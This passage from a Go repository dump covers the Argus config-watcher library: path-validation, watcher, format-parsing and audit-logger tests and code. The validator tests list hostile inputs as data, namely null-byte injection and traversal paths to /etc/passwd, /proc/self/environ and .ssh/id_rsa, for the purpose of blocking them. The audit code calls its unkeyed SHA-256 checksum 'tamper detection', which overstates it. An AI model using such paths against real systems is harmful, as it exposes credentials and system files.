			path:          "config.json\x00.txt",
			shouldFail:    true,
			expectedError: "null byte in path not allowed",
			description:   "Null byte injection should be blocked",
		},
		{
			name:          "ControlCharacterInjection",
			path:          "config\x01.json",
			shouldFail:    true,
			expectedError: "control character in path not allowed",
			description:   "Control characters should be blocked",
		},

		// Edge cases that should be allowed
		{
			name:        "ValidDotFile",
			path:        ".gitignore",
			shouldFail:  false,
			description: "Valid dot files should be allowed",
		},
		{
			name:        "ValidWindowsDrive",
			path:        "C:\\configs\\app.json",
			shouldFail:  false,
			description: "Valid Windows drive paths should be allowed",
		},
		{
			name:        "ValidURLScheme",
			path:        "http://example.com/config",
			shouldFail:  false,
			description: "Valid URL schemes should be allowed",
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			err := ValidateSecurePath(tt.path)

			if tt.shouldFail {
				if err == nil {
					t.Errorf("ValidateSecurePath(%q) should have failed but didn't. %s",
						tt.path, tt.description)
					return
				}
				if tt.expectedError != "" && !strings.Contains(err.Error(), tt.expectedError) {
					t.Errorf("ValidateSecurePath(%q) error = %v, want error containing %q. %s",
						tt.path, err, tt.expectedError, tt.description)
				}
			} else {
				if err != nil {
					t.Errorf("ValidateSecurePath(%q) should not have failed but got error: %v. %s",
						tt.path, err, tt.description)
				}
			}
		})
	}

	// Additional case sensitivity consistency test
	t.Run("CaseSensitivityConsistency", func(t *testing.T) {
		// Test that both upper and lower case versions of dangerous patterns are caught
		dangerousPairs := []struct {
			lower, upper string
		}{
			{"../../../etc/passwd", "../../../ETC/PASSWD"},
			{"..\\windows\\system32", "..\\WINDOWS\\SYSTEM32"},
			{"/proc/self/environ", "/PROC/SELF/ENVIRON"},
			{"config/.ssh/id_rsa", "CONFIG/.SSH/ID_RSA"},
		}

		for _, pair := range dangerousPairs {
			lowerErr := ValidateSecurePath(pair.lower)
			upperErr := ValidateSecurePath(pair.upper) // Both should fail (or both should pass)
			if (lowerErr == nil) != (upperErr == nil) {
				t.Errorf("Case sensitivity inconsistency: lower=%q (err=%v), upper=%q (err=%v)",
					pair.lower, lowerErr, pair.upper, upperErr)
			}
		}
	})
}

```
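
The `TestSecurity_ValidateSecurePath` table above pins down case-insensitive traversal detection. As a minimal standalone sketch of that style of check (the `containsTraversal` helper is hypothetical, not Argus's actual implementation):

```go
package main

import (
	"fmt"
	"strings"
)

// containsTraversal reports whether a path holds a parent-directory
// traversal pattern. The path is lowercased first so mixed-case payloads
// like "..\\WINDOWS\\SYSTEM32" or URL-encoded "%2E%2E" are caught too.
func containsTraversal(path string) bool {
	lower := strings.ToLower(path)
	if lower == ".." {
		return true
	}
	patterns := []string{"../", "..\\", "%2e%2e", "%252e"}
	for _, p := range patterns {
		if strings.Contains(lower, p) {
			return true
		}
	}
	return false
}

func main() {
	fmt.Println(containsTraversal("../../../ETC/PASSWD")) // true
	fmt.Println(containsTraversal("configs/app.yaml"))    // false
}
```

The real validator layers further checks (system paths, device names, length limits) on top; the key point the tests enforce is that lowercasing happens before pattern matching, so case variants cannot slip through.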

## /argus_test.go

```go path="/argus_test.go" 
// argus_test.go - Comprehensive test suite for Argus Dynamic Configuration Framework
//
// Copyright (c) 2025 AGILira - A. Giordano
// Series: an AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"os"
	"path/filepath"
	"sync"
	"testing"
	"time"
)

// TestWatcherBasicFunctionality tests the core watcher functionality
func TestWatcherBasicFunctionality(t *testing.T) {
	// Create temporary test file
	tmpDir := t.TempDir()
	testFile := filepath.Join(tmpDir, "test_config.json")

	// Write initial content
	initialContent := `{"level": "info"}`
	if err := os.WriteFile(testFile, []byte(initialContent), 0644); err != nil {
		t.Fatalf("Failed to create test file: %v", err)
	}

	// Create watcher with short intervals for testing
	watcher := New(Config{
		PollInterval: 100 * time.Millisecond,
		CacheTTL:     50 * time.Millisecond,
	})

	// Track changes with mutex for race-safe access
	var mu sync.Mutex
	changeCount := 0
	var lastEvent ChangeEvent

	err := watcher.Watch(testFile, func(event ChangeEvent) {
		mu.Lock()
		changeCount++
		lastEvent = event
		mu.Unlock()
	})
	if err != nil {
		t.Fatalf("Failed to watch file: %v", err)
	}

	// Start watcher
	if err := watcher.Start(); err != nil {
		t.Fatalf("Failed to start watcher: %v", err)
	}
	defer func() { _ = watcher.Stop() }() // Ignore cleanup errors in tests

	// Wait a bit to ensure initial scan
	time.Sleep(150 * time.Millisecond)
	mu.Lock()
	initialCount := changeCount
	mu.Unlock()

	// Modify the file
	modifiedContent := `{"level": "debug"}`
	if err := os.WriteFile(testFile, []byte(modifiedContent), 0644); err != nil {
		t.Fatalf("Failed to modify test file: %v", err)
	}

	// Wait for change detection
	time.Sleep(200 * time.Millisecond)

	// Verify change was detected
	mu.Lock()
	currentCount := changeCount
	currentEvent := lastEvent
	mu.Unlock()

	if currentCount <= initialCount {
		t.Errorf("Expected change to be detected, changeCount: %d, initialCount: %d", currentCount, initialCount)
	}

	if !currentEvent.IsModify {
		t.Errorf("Expected modify event, got: %+v", currentEvent)
	}

	if currentEvent.Path != testFile {
		t.Errorf("Expected path %s, got %s", testFile, currentEvent.Path)
	}
}

// TestWatcherCaching tests the caching mechanism
func TestWatcherCaching(t *testing.T) {
	tmpDir := t.TempDir()
	testFile := filepath.Join(tmpDir, "cache_test.json")

	if err := os.WriteFile(testFile, []byte(`{"test": true}`), 0644); err != nil {
		t.Fatalf("Failed to create test file: %v", err)
	}

	watcher := New(Config{
		PollInterval: 1 * time.Second, // Long interval
		CacheTTL:     500 * time.Millisecond,
	})

	// Get stat twice quickly - should use cache
	stat1, err1 := watcher.getStat(testFile)
	if err1 != nil {
		t.Fatalf("First getStat failed: %v", err1)
	}

	stat2, err2 := watcher.getStat(testFile)
	if err2 != nil {
		t.Fatalf("Second getStat failed: %v", err2)
	}

	// Should be identical (from cache)
	if stat1.cachedAt != stat2.cachedAt {
		t.Errorf("Expected cached result, but got different cache times")
	}

	// Wait for cache to expire
	time.Sleep(600 * time.Millisecond)

	stat3, err3 := watcher.getStat(testFile)
	if err3 != nil {
		t.Fatalf("Third getStat failed: %v", err3)
	}

	// Should be different (cache expired)
	if stat1.cachedAt == stat3.cachedAt {
		t.Errorf("Expected cache to expire, but got same cache time")
	}
}

// TestWatcherFileCreationDeletion tests file creation and deletion events
func TestWatcherFileCreationDeletion(t *testing.T) {
	tmpDir := t.TempDir()
	testFile := filepath.Join(tmpDir, "create_delete_test.json")

	// Use slower polling for macOS CI reliability
	watcher := New(Config{
		PollInterval: 250 * time.Millisecond, // Slower polling for macOS CI
		CacheTTL:     100 * time.Millisecond, // Longer cache for stability
	})

	events := []ChangeEvent{}
	var eventsMutex sync.Mutex
	err := watcher.Watch(testFile, func(event ChangeEvent) {
		eventsMutex.Lock()
		events = append(events, event)
		t.Logf("Event received: IsCreate=%v, IsDelete=%v, IsModify=%v, Path=%s",
			event.IsCreate, event.IsDelete, event.IsModify, event.Path)
		eventsMutex.Unlock()
	})
	if err != nil {
		t.Fatalf("Failed to watch file: %v", err)
	}

	if err := watcher.Start(); err != nil {
		t.Fatalf("Failed to start watcher: %v", err)
	}
	defer func() { _ = watcher.Stop() }() // Ignore cleanup errors in tests

	// Ensure watcher is running
	if !watcher.IsRunning() {
		t.Fatalf("Watcher should be running")
	}

	// Extended setup time for macOS CI environments - reduced for timeout constraints
	t.Logf("Waiting for watcher setup...")
	time.Sleep(500 * time.Millisecond) // Reduced from 1 second

	t.Logf("Creating file: %s", testFile)
	// Create the file
	if err := os.WriteFile(testFile, []byte(`{"created": true}`), 0644); err != nil {
		t.Fatalf("Failed to create test file: %v", err)
	}

	// Wait for create event with reduced timeout for CI constraints
	maxWait := 20 // 20 * 250ms = 5 seconds max (reduced from 10s)
	for i := 0; i < maxWait; i++ {
		eventsMutex.Lock()
		currentEvents := len(events)
		hasCreate := false
		for _, e := range events {
			if e.IsCreate || (!e.IsDelete && e.Path == testFile) {
				hasCreate = true
				break
			}
		}
		eventsMutex.Unlock()

		if hasCreate {
			t.Logf("Create event detected after %d attempts, total events: %d", i+1, currentEvents)
			break
		}
		time.Sleep(250 * time.Millisecond)
	}

	// Give time between operations - reduced for timeout constraints
	time.Sleep(500 * time.Millisecond) // Reduced from 1 second

	t.Logf("Deleting file: %s", testFile)
	// Delete the file
	if err := os.Remove(testFile); err != nil {
		t.Fatalf("Failed to delete test file: %v", err)
	}

	// Wait for delete event with extended retry for macOS CI
	for i := 0; i < maxWait; i++ {
		eventsMutex.Lock()
		currentEvents := len(events)
		hasDelete := false
		for _, e := range events {
			if e.IsDelete {
				hasDelete = true
				break
			}
		}
		eventsMutex.Unlock()

		if hasDelete {
			t.Logf("Delete event detected after %d attempts, total events: %d", i+1, currentEvents)
			break
		}
		time.Sleep(250 * time.Millisecond)
	}

	// Final wait to catch any late events - reduced for timeout constraints
	time.Sleep(500 * time.Millisecond) // Reduced from 1 second

	// Check events with mutex protection
	eventsMutex.Lock()
	eventCount := len(events)
	eventsCopy := make([]ChangeEvent, len(events))
	copy(eventsCopy, events)
	eventsMutex.Unlock()

	t.Logf("Total events received: %d", eventCount)
	for i, event := range eventsCopy {
		t.Logf("Event %d: IsCreate=%v, IsDelete=%v, IsModify=%v, Path=%s",
			i, event.IsCreate, event.IsDelete, event.IsModify, event.Path)
	}

	// On macOS CI, filesystem events might be very slow or not detected
	// We'll be more lenient and allow the test to pass with fewer events
	if eventCount == 0 {
		// Quick alternative detection for CI environments with timeout constraints
		t.Logf("No events detected, trying quick alternative detection...")

		// Try one more file modification with shorter delay
		if err := os.WriteFile(testFile, []byte(`{"test": 1, "retry": true}`), 0644); err == nil {
			time.Sleep(500 * time.Millisecond) // Much shorter delay for CI

			eventsMutex.Lock()
			currentCount := len(events)
			eventsMutex.Unlock()

			if currentCount > 0 {
				t.Logf("Quick retry successful: %d events", currentCount)
			} else {
				// Try one alternative file quickly
				altFile := filepath.Join(filepath.Dir(testFile), "quick_test.json")
				if err := os.WriteFile(altFile, []byte(`{"quick": true}`), 0644); err == nil {
					_ = watcher.Watch(altFile, func(event ChangeEvent) { // Ignore watch error in test
						eventsMutex.Lock()
						events = append(events, event)
						t.Logf("Quick alt event: %+v", event)
						eventsMutex.Unlock()
					})

					time.Sleep(500 * time.Millisecond) // Short wait only

					eventsMutex.Lock()
					currentCount = len(events)
					eventsMutex.Unlock()

					if currentCount > 0 {
						t.Logf("Quick alternative detection successful: %d events", currentCount)
					}
				}
			}
		}

		eventsMutex.Lock()
		finalEventCount := len(events)
		eventsMutex.Unlock()

		if finalEventCount == 0 {
			t.Skip("No file events detected - this appears to be a macOS CI filesystem limitation")
		}

		t.Logf("Alternative detection successful: %d events", finalEventCount)
		// Continue with the test using the events we got
		eventsMutex.Lock()
		eventCount = len(events)
		eventsCopy = make([]ChangeEvent, len(events))
		copy(eventsCopy, events)
		eventsMutex.Unlock()
	}

	// Look for create-like events (creation or first modification)
	hasCreateActivity := false
	hasDeleteActivity := false

	for _, event := range eventsCopy {
		if event.IsCreate || (event.IsModify && !event.IsDelete) {
			hasCreateActivity = true
		}
		if event.IsDelete {
			hasDeleteActivity = true
		}
	}

	if !hasCreateActivity {
		t.Errorf("Expected file creation activity, but none detected")
	}

	// Delete detection might be less reliable on some filesystems
	if !hasDeleteActivity {
		t.Logf("Warning: Delete event not detected - this might be filesystem-dependent")
	}

	// Ensure we have reasonable activity
	if eventCount < 1 {
		t.Errorf("Expected at least 1 file event, got %d", eventCount)
	}
}

// TestWatcherMultipleFiles tests watching multiple files
func TestWatcherMultipleFiles(t *testing.T) {
	tmpDir := t.TempDir()
	file1 := filepath.Join(tmpDir, "config1.json")
	file2 := filepath.Join(tmpDir, "config2.json")

	// Create test files
	if err := os.WriteFile(file1, []byte(`{"file": 1}`), 0644); err != nil {
		t.Fatalf("Failed to create file1: %v", err)
	}
	if err := os.WriteFile(file2, []byte(`{"file": 2}`), 0644); err != nil {
		t.Fatalf("Failed to create file2: %v", err)
	}

	watcher := New(Config{
		PollInterval: 100 * time.Millisecond,
		CacheTTL:     50 * time.Millisecond,
	})

	changes := make(map[string]int)
	var changesMutex sync.Mutex
	callback := func(event ChangeEvent) {
		changesMutex.Lock()
		changes[event.Path]++
		changesMutex.Unlock()
	}

	// Watch both files
	if err := watcher.Watch(file1, callback); err != nil {
		t.Fatalf("Failed to watch file1: %v", err)
	}
	if err := watcher.Watch(file2, callback); err != nil {
		t.Fatalf("Failed to watch file2: %v", err)
	}

	if watcher.WatchedFiles() != 2 {
		t.Errorf("Expected 2 watched files, got %d", watcher.WatchedFiles())
	}

	if err := watcher.Start(); err != nil {
		t.Fatalf("Failed to start watcher: %v", err)
	}
	defer func() { _ = watcher.Stop() }() // Ignore cleanup errors in tests

	time.Sleep(150 * time.Millisecond) // Initial scan

	// Modify both files
	if err := os.WriteFile(file1, []byte(`{"file": 1, "modified": true}`), 0644); err != nil {
		t.Fatalf("Failed to modify file1: %v", err)
	}
	if err := os.WriteFile(file2, []byte(`{"file": 2, "modified": true}`), 0644); err != nil {
		t.Fatalf("Failed to modify file2: %v", err)
	}

	time.Sleep(200 * time.Millisecond)

	// Both files should have been detected; read the map under the same
	// mutex the callback uses to keep the test race-safe
	changesMutex.Lock()
	file1Changes := changes[file1]
	file2Changes := changes[file2]
	changesMutex.Unlock()

	if file1Changes == 0 {
		t.Errorf("No changes detected for file1")
	}
	if file2Changes == 0 {
		t.Errorf("No changes detected for file2")
	}
}

// TestWatcherUnwatch tests removing files from watch list
func TestWatcherUnwatch(t *testing.T) {
	tmpDir := t.TempDir()
	testFile := filepath.Join(tmpDir, "unwatch_test.json")

	if err := os.WriteFile(testFile, []byte(`{"test": true}`), 0644); err != nil {
		t.Fatalf("Failed to create test file: %v", err)
	}

	watcher := New(Config{
		PollInterval: 100 * time.Millisecond,
	})

	var mu sync.Mutex
	changeCount := 0
	if err := watcher.Watch(testFile, func(event ChangeEvent) {
		mu.Lock()
		changeCount++
		mu.Unlock()
	}); err != nil {
		t.Fatalf("Failed to watch file: %v", err)
	}

	if watcher.WatchedFiles() != 1 {
		t.Errorf("Expected 1 watched file, got %d", watcher.WatchedFiles())
	}

	// Unwatch the file
	if err := watcher.Unwatch(testFile); err != nil {
		t.Fatalf("Failed to unwatch file: %v", err)
	}

	if watcher.WatchedFiles() != 0 {
		t.Errorf("Expected 0 watched files after unwatch, got %d", watcher.WatchedFiles())
	}
}

// TestWatcherCacheStats tests cache statistics
func TestWatcherCacheStats(t *testing.T) {
	tmpDir := t.TempDir()
	testFile := filepath.Join(tmpDir, "stats_test.json")

	if err := os.WriteFile(testFile, []byte(`{"test": true}`), 0644); err != nil {
		t.Fatalf("Failed to create test file: %v", err)
	}

	watcher := New(Config{
		CacheTTL: 1 * time.Second,
	})

	// Initial stats should be empty
	stats := watcher.GetCacheStats()
	if stats.Entries != 0 {
		t.Errorf("Expected 0 cache entries initially, got %d", stats.Entries)
	}

	// Add some cache entries
	_, _ = watcher.getStat(testFile)
	_, _ = watcher.getStat(filepath.Join(tmpDir, "nonexistent.json"))

	stats = watcher.GetCacheStats()
	if stats.Entries != 2 {
		t.Errorf("Expected 2 cache entries, got %d", stats.Entries)
	}

	// Clear cache
	watcher.ClearCache()
	stats = watcher.GetCacheStats()
	if stats.Entries != 0 {
		t.Errorf("Expected 0 cache entries after clear, got %d", stats.Entries)
	}
}

func TestUniversalFormats(t *testing.T) {
	// Create a temporary directory for test files
	tmpDir, err := os.MkdirTemp("", "argus_universal_test_")
	if err != nil {
		t.Fatalf("Failed to create temp dir: %v", err)
	}
	defer func() { _ = os.RemoveAll(tmpDir) }() // Ignore cleanup errors in tests

	// Test configurations for each format
	testConfigs := map[string]string{
		"config.json": `{
			"service_name": "test-service",
			"port": 8080,
			"log_level": "debug",
			"enabled": true
		}`,
		"config.yml": `service_name: test-service
port: 8080
log_level: debug
enabled: true`,
		"config.toml": `service_name = "test-service"
port = 8080
log_level = "debug"
enabled = true`,
		"config.hcl": `service_name = "test-service"
port = 8080
log_level = "debug"
enabled = true`,
		"config.ini": `[service]
service_name = test-service
port = 8080
log_level = debug
enabled = true`,
		"config.properties": `service.name=test-service
server.port=8080
log.level=debug
feature.enabled=true`,
	}

	// Test each format
	for filename, content := range testConfigs {
		t.Run(filename, func(t *testing.T) {
			// Write test file
			filePath := filepath.Join(tmpDir, filename)
			err := os.WriteFile(filePath, []byte(content), 0644)
			if err != nil {
				t.Fatalf("Failed to write test file %s: %v", filename, err)
			}

			// Set up callback to capture config changes
			var capturedConfig map[string]interface{}
			callbackCalled := make(chan bool, 1)

			callback := func(config map[string]interface{}) {
				capturedConfig = config
				callbackCalled <- true
			}

			// Start watching
			watcher, err := UniversalConfigWatcher(filePath, callback)
			if err != nil {
				t.Fatalf("Failed to create watcher for %s: %v", filename, err)
			}
			defer func() { _ = watcher.Stop() }() // Ignore cleanup errors in tests

			// Wait for initial callback or timeout
			select {
			case <-callbackCalled:
				// Success - config was loaded
			case <-time.After(2 * time.Second):
				t.Fatalf("Timeout waiting for initial config load for %s", filename)
			}

			// Verify config was parsed
			if capturedConfig == nil {
				t.Fatalf("No config captured for %s", filename)
			}

			t.Logf("✅ Successfully parsed %s: %+v", filename, capturedConfig)
		})
	}
}

func TestDetectFormatPerfect(t *testing.T) {
	tests := []struct {
		filename string
		expected ConfigFormat
	}{
		{"config.json", FormatJSON},
		{"app.yml", FormatYAML},
		{"docker-compose.yaml", FormatYAML},
		{"Cargo.toml", FormatTOML},
		{"terraform.hcl", FormatHCL},
		{"main.tf", FormatHCL},
		{"app.ini", FormatINI},
		{"system.conf", FormatINI},
		{"server.cfg", FormatINI},
		{"application.properties", FormatProperties},
		{"unknown.txt", FormatUnknown},
	}

	for _, test := range tests {
		t.Run(test.filename, func(t *testing.T) {
			format := DetectFormat(test.filename)
			if format != test.expected {
				t.Errorf("DetectFormat(%s) = %v, expected %v", test.filename, format, test.expected)
			}
		})
	}
}

func TestParseConfigFormatsPerfect(t *testing.T) {
	tests := []struct {
		name    string
		format  ConfigFormat
		content string
		wantKey string
		wantVal interface{}
	}{
		{
			name:    "JSON",
			format:  FormatJSON,
			content: `{"service": "test", "port": 8080}`,
			wantKey: "service",
			wantVal: "test",
		},
		{
			name:    "YAML",
			format:  FormatYAML,
			content: "service: test\nport: 8080",
			wantKey: "service",
			wantVal: "test",
		},
		{
			name:    "TOML",
			format:  FormatTOML,
			content: `service = "test"` + "\n" + `port = 8080`,
			wantKey: "service",
			wantVal: "test",
		},
		{
			name:    "HCL",
			format:  FormatHCL,
			content: `service = "test"` + "\n" + `port = 8080`,
			wantKey: "service",
			wantVal: "test",
		},
		{
			name:    "Properties",
			format:  FormatProperties,
			content: "service.name=test\nserver.port=8080",
			wantKey: "service.name",
			wantVal: "test",
		},
	}

	for _, test := range tests {
		t.Run(test.name, func(t *testing.T) {
			config, err := ParseConfig([]byte(test.content), test.format)
			if err != nil {
				t.Fatalf("ParseConfig failed for %s: %v", test.name, err)
			}

			if config[test.wantKey] != test.wantVal {
				t.Errorf("Expected %s=%v, got %v", test.wantKey, test.wantVal, config[test.wantKey])
			}
		})
	}
}

```
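
`TestDetectFormatPerfect` above fixes the extension-to-format mapping. A simplified sketch of that kind of extension-based detection (the `detectFormat` helper is hypothetical, not the real `DetectFormat`):

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// detectFormat maps a filename's extension (lowercased) to a format name,
// falling back to "unknown" for unrecognized extensions.
func detectFormat(filename string) string {
	switch strings.ToLower(filepath.Ext(filename)) {
	case ".json":
		return "json"
	case ".yml", ".yaml":
		return "yaml"
	case ".toml":
		return "toml"
	case ".hcl", ".tf":
		return "hcl"
	case ".ini", ".conf", ".cfg":
		return "ini"
	case ".properties":
		return "properties"
	default:
		return "unknown"
	}
}

func main() {
	fmt.Println(detectFormat("docker-compose.yaml")) // yaml
	fmt.Println(detectFormat("unknown.txt"))         // unknown
}
```

Keying off `filepath.Ext` keeps the mapping O(1) per lookup and covers the multi-extension cases in the table (`.yml`/`.yaml`, `.ini`/`.conf`/`.cfg`) with a single switch.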

## /assets/banner.png

Binary file available at https://raw.githubusercontent.com/agilira/argus/refs/heads/main/assets/banner.png

## /audit.go

```go path="/audit.go" 
// audit.go: Comprehensive audit trail system for Argus
//
// This provides security audit logging for all configuration changes,
// ensuring full accountability and traceability in production environments.
//
// Features:
// - Immutable audit logs with tamper detection
// - Structured logging with context
// - Performance optimized (sub-microsecond impact)
// - Configurable audit levels and outputs
//
// Copyright (c) 2025 AGILira
// Series: AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"crypto/sha256"
	"fmt"
	"os"
	"sync"
	"time"

	"github.com/agilira/go-timecache"
)

// AuditLevel represents the severity of audit events
type AuditLevel int

const (
	AuditInfo AuditLevel = iota
	AuditWarn
	AuditCritical
	AuditSecurity
)

func (al AuditLevel) String() string {
	switch al {
	case AuditInfo:
		return "INFO"
	case AuditWarn:
		return "WARN"
	case AuditCritical:
		return "CRITICAL"
	case AuditSecurity:
		return "SECURITY"
	default:
		return "UNKNOWN"
	}
}

// AuditEvent represents a single auditable event
type AuditEvent struct {
	Timestamp   time.Time              `json:"timestamp"`
	Level       AuditLevel             `json:"level"`
	Event       string                 `json:"event"`
	Component   string                 `json:"component"`
	FilePath    string                 `json:"file_path,omitempty"`
	OldValue    interface{}            `json:"old_value,omitempty"`
	NewValue    interface{}            `json:"new_value,omitempty"`
	UserAgent   string                 `json:"user_agent,omitempty"`
	ProcessID   int                    `json:"process_id"`
	ProcessName string                 `json:"process_name"`
	Context     map[string]interface{} `json:"context,omitempty"`
	Checksum    string                 `json:"checksum"` // For tamper detection
}

// AuditConfig configures the audit system
type AuditConfig struct {
	Enabled       bool          `json:"enabled"`
	OutputFile    string        `json:"output_file"`
	MinLevel      AuditLevel    `json:"min_level"`
	BufferSize    int           `json:"buffer_size"`
	FlushInterval time.Duration `json:"flush_interval"`
	IncludeStack  bool          `json:"include_stack"`
}

// DefaultAuditConfig returns secure default audit configuration with unified SQLite storage.
//
// The default configuration uses the unified SQLite audit system, which consolidates
// all Argus audit events into a single system-wide database. This provides:
//   - Cross-component event correlation
//   - Efficient storage and querying
//   - Automatic schema management
//   - WAL mode for concurrent access
//
// For applications requiring JSONL format, specify OutputFile with .jsonl extension.
func DefaultAuditConfig() AuditConfig {
	// Use empty OutputFile to trigger unified SQLite backend selection
	// The backend will automatically use the system audit database path
	return AuditConfig{
		Enabled:       true,
		OutputFile:    "", // Empty triggers unified SQLite backend
		MinLevel:      AuditInfo,
		BufferSize:    1000,
		FlushInterval: 5 * time.Second,
		IncludeStack:  false,
	}
}

// AuditLogger provides high-performance audit logging with pluggable backends.
//
// This logger implements a unified audit system that automatically selects
// the optimal storage backend (SQLite for unified system audit, JSONL for
// backward compatibility) while maintaining the same public API.
//
// The logger uses buffering and background flushing for optimal performance
// in high-throughput scenarios while ensuring audit integrity.
type AuditLogger struct {
	config      AuditConfig
	backend     auditBackend // Pluggable storage backend (SQLite or JSONL)
	buffer      []AuditEvent
	bufferMu    sync.Mutex
	flushTicker *time.Ticker
	stopCh      chan struct{}
	processID   int
	processName string
}

// NewAuditLogger creates a new audit logger with automatic backend selection.
//
// The logger automatically selects the optimal audit backend based on system
// capabilities and configuration:
//   - SQLite unified backend for consolidation (preferred)
//   - JSONL fallback for compatibility
//
// This approach ensures seamless migration to unified audit trails while
// maintaining backward compatibility with existing configurations.
//
// Parameters:
//   - config: Audit configuration specifying behavior and output preferences
//
// Returns:
//   - Configured audit logger ready for use
//   - Error if both backend initialization attempts fail
func NewAuditLogger(config AuditConfig) (*AuditLogger, error) {
	// Initialize backend using automatic selection
	backend, err := createAuditBackend(config)
	if err != nil {
		return nil, fmt.Errorf("failed to initialize audit backend: %w", err)
	}

	logger := &AuditLogger{
		config:      config,
		backend:     backend,
		buffer:      make([]AuditEvent, 0, config.BufferSize),
		stopCh:      make(chan struct{}),
		processID:   os.Getpid(),
		processName: getProcessName(),
	}

	// Start background flusher
	if config.FlushInterval > 0 {
		logger.flushTicker = time.NewTicker(config.FlushInterval)
		go logger.flushLoop()
	}

	return logger, nil
}

// Log records an audit event with ultra-high performance
func (al *AuditLogger) Log(level AuditLevel, event, component, filePath string, oldVal, newVal interface{}, context map[string]interface{}) {
	if al == nil || al.backend == nil || !al.config.Enabled || level < al.config.MinLevel {
		return
	}

	// Use cached timestamp for performance (121x faster than time.Now())
	timestamp := timecache.CachedTime()

	auditEvent := AuditEvent{
		Timestamp:   timestamp,
		Level:       level,
		Event:       event,
		Component:   component,
		FilePath:    filePath,
		OldValue:    oldVal,
		NewValue:    newVal,
		ProcessID:   al.processID,
		ProcessName: al.processName,
		Context:     context,
	}

	// Generate tamper-detection checksum
	auditEvent.Checksum = al.generateChecksum(auditEvent)

	// Buffer the event
	al.bufferMu.Lock()
	al.buffer = append(al.buffer, auditEvent)
	if len(al.buffer) >= al.config.BufferSize {
		_ = al.flushBufferUnsafe() // Ignore flush errors during buffering to maintain performance
	}
	al.bufferMu.Unlock()
}

// LogConfigChange logs configuration file changes (most common use case)
func (al *AuditLogger) LogConfigChange(filePath string, oldConfig, newConfig map[string]interface{}) {
	al.Log(AuditCritical, "config_change", "argus", filePath, oldConfig, newConfig, nil)
}

// LogFileWatch logs file watch events
func (al *AuditLogger) LogFileWatch(event, filePath string) {
	al.Log(AuditInfo, event, "argus", filePath, nil, nil, nil)
}

// LogSecurityEvent logs security-related events; details are recorded in the event context
func (al *AuditLogger) LogSecurityEvent(event, details string, context map[string]interface{}) {
	if context == nil {
		context = map[string]interface{}{}
	}
	context["details"] = details
	al.Log(AuditSecurity, event, "argus", "", nil, nil, context)
}

// Flush immediately writes all buffered events
func (al *AuditLogger) Flush() error {
	al.bufferMu.Lock()
	defer al.bufferMu.Unlock()
	return al.flushBufferUnsafe()
}

// Close gracefully shuts down the audit logger
func (al *AuditLogger) Close() error {
	close(al.stopCh)
	if al.flushTicker != nil {
		al.flushTicker.Stop()
	}

	// Final flush to ensure all events are persisted
	if err := al.Flush(); err != nil {
		return fmt.Errorf("failed to flush audit logger during close: %w", err)
	}

	// Close backend and release resources
	if al.backend != nil {
		if err := al.backend.Close(); err != nil {
			return fmt.Errorf("failed to close audit backend: %w", err)
		}
	}

	return nil
}

// flushLoop runs the background flush process
func (al *AuditLogger) flushLoop() {
	for {
		select {
		case <-al.flushTicker.C:
			_ = al.Flush() // Ignore flush errors in background process to maintain performance
		case <-al.stopCh:
			return
		}
	}
}

// flushBufferUnsafe writes buffer to backend storage (caller must hold bufferMu).
//
// This method delegates to the configured backend (SQLite or JSONL) for
// actual persistence. It handles batch writing for optimal performance
// and proper error handling with buffer management.
func (al *AuditLogger) flushBufferUnsafe() error {
	if len(al.buffer) == 0 {
		return nil
	}

	// Write batch to backend
	if err := al.backend.Write(al.buffer); err != nil {
		return fmt.Errorf("failed to write audit events to backend: %w", err)
	}

	// Clear buffer after successful write
	al.buffer = al.buffer[:0]
	return nil
}

// generateChecksum creates a tamper-detection checksum using SHA-256
func (al *AuditLogger) generateChecksum(event AuditEvent) string {
	// Cryptographic hash for tamper detection
	data := fmt.Sprintf("%s:%s:%s:%v:%v",
		event.Timestamp.Format(time.RFC3339Nano),
		event.Event, event.Component, event.OldValue, event.NewValue)
	hash := sha256.Sum256([]byte(data))
	return fmt.Sprintf("%x", hash)
}

// Helper functions
func getProcessName() string {
	return "argus" // Could read from /proc/self/comm
}

```

## /audit_test.go

```go path="/audit_test.go" 
// audit_test.go - Comprehensive test suite for Argus audit system
//
// Copyright (c) 2025 AGILira - A. Giordano
// Series: an AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"os"
	"testing"
	"time"
)

func TestAuditLogger(t *testing.T) {
	// Create temporary audit file
	tmpFile, err := os.CreateTemp("", "audit-*.jsonl")
	if err != nil {
		t.Fatal(err)
	}
	defer func() {
		if err := os.Remove(tmpFile.Name()); err != nil {
			t.Errorf("Failed to remove tmpFile: %v", err)
		}
	}()
	if err := tmpFile.Close(); err != nil {
		t.Errorf("Failed to close tmpFile: %v", err)
	}

	// Create audit config
	config := AuditConfig{
		Enabled:       true,
		OutputFile:    tmpFile.Name(),
		MinLevel:      AuditInfo,
		BufferSize:    10,
		FlushInterval: 100 * time.Millisecond,
		IncludeStack:  false,
	}

	// Create audit logger
	auditor, err := NewAuditLogger(config)
	if err != nil {
		t.Fatal(err)
	}
	defer func() {
		if err := auditor.Close(); err != nil {
			t.Errorf("Failed to close auditor: %v", err)
		}
	}()

	// Test file watch audit
	auditor.LogFileWatch("test_event", "/test/path")

	// Test config change audit
	oldConfig := map[string]interface{}{
		"log_level": "info",
		"port":      8080,
	}
	newConfig := map[string]interface{}{
		"log_level": "debug",
		"port":      9090,
	}
	auditor.LogConfigChange("/test/config.json", oldConfig, newConfig)

	// Force flush
	if err := auditor.Flush(); err != nil {
		t.Errorf("Failed to flush auditor: %v", err)
	}

	// Wait a bit
	time.Sleep(200 * time.Millisecond)

	// Read audit file
	auditData, err := os.ReadFile(tmpFile.Name())
	if err != nil {
		t.Fatal(err)
	}

	auditString := string(auditData)
	if len(auditString) == 0 {
		t.Fatal("Expected audit output, got empty file")
	}

	t.Logf("✅ Audit output:\n%s", auditString)
}

func TestWatcherWithAudit(t *testing.T) {
	// Create temporary config file
	tmpFile, err := os.CreateTemp("", "test-config-*.json")
	if err != nil {
		t.Fatal(err)
	}
	defer func() {
		if err := os.Remove(tmpFile.Name()); err != nil {
			t.Errorf("Failed to remove tmpFile: %v", err)
		}
	}()

	// Write initial config
	initialConfig := `{"log_level": "info", "port": 8080}`
	if _, err := tmpFile.WriteString(initialConfig); err != nil {
		t.Fatal(err)
	}
	if err := tmpFile.Close(); err != nil {
